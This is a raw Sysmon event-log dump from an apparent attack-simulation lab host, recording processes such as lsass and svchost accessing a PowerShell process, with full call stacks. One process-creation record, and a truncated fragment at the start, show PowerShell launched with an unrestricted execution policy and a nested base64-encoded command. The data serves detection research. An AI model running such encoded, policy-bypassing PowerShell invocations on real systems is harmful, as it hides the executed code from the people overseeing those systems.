EEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x8000000000000000357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.434{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.434{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.388{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_egkus23s.wed.ps12021-01-18 13:33:19.388 10341000x8000000000000000354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.388{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.388{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.388{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.388{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8E1F-6005-CB02-00000000A201}41484316C:\Windows\system32\conhost.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8C95-6005-0500-00000000A201}640764C:\Windows\system32\csrss.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.356{59A5CD1D-8E1F-6005-CC02-00000000A201}48841148C:\Windows\system32\cmd.exe{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:19.357{59A5CD1D-8E1F-6005-CD02-00000000A201}888C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBB